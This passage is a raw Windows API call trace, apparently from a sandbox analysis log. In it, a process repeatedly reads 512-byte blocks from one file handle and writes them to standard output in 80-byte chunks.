lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.623] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.624] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=4) returned 0x54 
[0216.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.625] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, 
lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.626] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 
0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.627] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) 
returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0216.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.628] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] GetFileType (hFile=0x4c) returned 0x1 [0216.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.629] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.629] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType 
(hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] GetFileType (hFile=0x4c) returned 0x1 [0216.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.630] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.683] GetFileType (hFile=0x4c) returned 0x1 [0216.683] 
